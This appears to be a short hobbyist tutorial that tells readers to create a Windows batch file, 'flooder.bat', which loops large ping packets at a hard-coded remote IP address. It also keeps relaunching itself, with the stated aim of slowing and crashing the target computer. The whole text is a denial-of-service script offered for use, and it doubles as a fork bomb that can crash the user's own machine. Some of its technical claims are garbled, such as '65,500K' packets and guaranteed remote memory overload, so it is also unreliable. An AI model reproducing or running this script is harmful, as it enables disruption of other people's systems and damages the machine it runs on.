This program slows down the remote computer connected in network. This can be
done by continuously pinging the remote host by setting the length of the packet to 65,500K. at the
receiving end, the remote computer receives mushrooms of packets of larger size, and if it goes on for
some time, the memory on the remote system automatically overloads and finally the remote system will
crash.
1.Open notepad
2.Type
@echo off
:flood
ping -l 65500 -t 10.199.64.66
start flooder.bat
goto flood
3.Save this file as flooder.bat.
It will open up lot of command windows on your screen too, there are chances for your computer to crash too.